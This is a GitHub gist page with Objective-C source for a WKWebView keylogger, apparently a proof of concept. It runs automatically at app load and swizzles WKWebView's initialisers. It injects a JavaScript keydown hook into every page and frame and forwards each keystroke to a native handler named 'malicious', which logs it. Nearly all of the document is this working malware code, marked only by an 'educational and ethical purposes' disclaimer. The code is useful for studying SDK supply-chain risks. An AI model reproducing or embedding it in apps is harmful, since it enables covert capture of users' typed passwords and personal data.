Skip to content

Instantly share code, notes, and snippets.

@hfossli

hfossli/WKWebViewKeyLogger.m

Created October 11, 2018 07:17
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save hfossli/c84ac9f2a4b32e575f0ba18f6c927da8 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save hfossli/c84ac9f2a4b32e575f0ba18f6c927da8 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. hfossli created this gist Oct 11, 2018.
    117 changes: 117 additions & 0 deletions WKWebViewKeyLogger.m
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,117 @@
    //
    // Author: Håvard Fossli <[email protected]>
    //
    // Copyright (c) 2018 Agens AS (http://agens.no/)
    //
    // Permission is hereby granted, free of charge, to any person obtaining a copy
    // of this software and associated documentation files (the "Software"), to deal
    // in the Software without restriction, including without limitation the rights
    // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    // copies of the Software, and to permit persons to whom the Software is
    // furnished to do so, subject to the following conditions:
    //
    // The above copyright notice and this permission notice shall be included in
    // all copies or substantial portions of the Software.
    //
    // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
    // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
    // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
    // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
    // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
    // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
    // THE SOFTWARE.

    /*
    WKWebViewKeyLogger will automatically add itself to the objc runtime and add a keylogger to any WKWebView created.
    This software should only be used for educational and ethical purposes.
    */

    #import <objc/runtime.h>
    #import <WebKit/WebKit.h>

    @interface WKWebViewKeyLogger : NSObject <WKScriptMessageHandler>
    + (instancetype)sharedInstance;
    + (NSString *)script;
    @end


    @interface NSObject (Malicious)
    @end
    @implementation NSObject (Malicious)
    + (void)load {
    [WKWebViewKeyLogger sharedInstance];
    }
    @end

    @implementation WKWebView (WKWebViewKeyLogger)

    - (instancetype)init_WKWebViewKeyLogger {
    self = [self initWithFrame:CGRectZero configuration:[WKWebViewConfiguration new]]; // calls swizzled init
    return self;
    }

    - (instancetype)init_WKWebViewKeyLogger_withFrame:(CGRect)frame configuration:(WKWebViewConfiguration *)configuration {
    configuration = [configuration copy] ?: [WKWebViewConfiguration new];
    WKUserScript *script = [[WKUserScript alloc] initWithSource:[WKWebViewKeyLogger script] injectionTime:WKUserScriptInjectionTimeAtDocumentStart forMainFrameOnly:FALSE];
    WKUserContentController *contents = [WKUserContentController new];
    [contents addUserScript:script];
    [contents addScriptMessageHandler:[WKWebViewKeyLogger sharedInstance] name:@"malicious"];
    configuration.userContentController = contents;

    self = [self init_WKWebViewKeyLogger_withFrame:frame configuration:configuration]; // calls WKWebView's init
    return self;
    }

    - (instancetype)init_WKWebViewKeyLogger_withCoder:(NSCoder *)coder {
    // TODO: Probably need to create a new WKWebView with the coder and copy all its values and settings
    self = [self init_WKWebViewKeyLogger_withCoder:coder]; // calls WKWebView's init
    return self;
    }

    @end

    @implementation WKWebViewKeyLogger

    + (NSString *)script {
    return
    @"document.onkeydown = function (e) {"
    @" window.webkit.messageHandlers.malicious.postMessage(e.key);"
    @"};";
    }

    static void SwizzleMethods(Class c, SEL orig, SEL new) {
    struct objc_method *origMethod = class_getInstanceMethod(c, orig);
    struct objc_method *newMethod = class_getInstanceMethod(c, new);
    if(class_addMethod(c, orig, method_getImplementation(newMethod), method_getTypeEncoding(newMethod)))
    class_replaceMethod(c, new, method_getImplementation(origMethod), method_getTypeEncoding(origMethod));
    else
    method_exchangeImplementations(origMethod, newMethod);
    }

    + (instancetype)sharedInstance {
    static WKWebViewKeyLogger *sharedInstance;
    static dispatch_once_t onceToken;
    dispatch_once(&onceToken, ^{
    sharedInstance = [self new];
    [sharedInstance swizzleInitMethods];
    });
    return sharedInstance;
    }

    - (void)swizzleInitMethods {
    static dispatch_once_t onceToken;
    dispatch_once(&onceToken, ^{
    SwizzleMethods([WKWebView class], @selector(init), @selector(init_WKWebViewKeyLogger));
    SwizzleMethods([WKWebView class], @selector(initWithFrame:configuration:), @selector(init_WKWebViewKeyLogger_withFrame:configuration:));
    SwizzleMethods([WKWebView class], @selector(initWithCoder:), @selector(init_WKWebViewKeyLogger_withCoder:));
    });
    }

    - (void)userContentController:(WKUserContentController *)userContentController didReceiveScriptMessage:(WKScriptMessage *)message {
    NSLog(@"😈: %@", message.body);
    }

    @end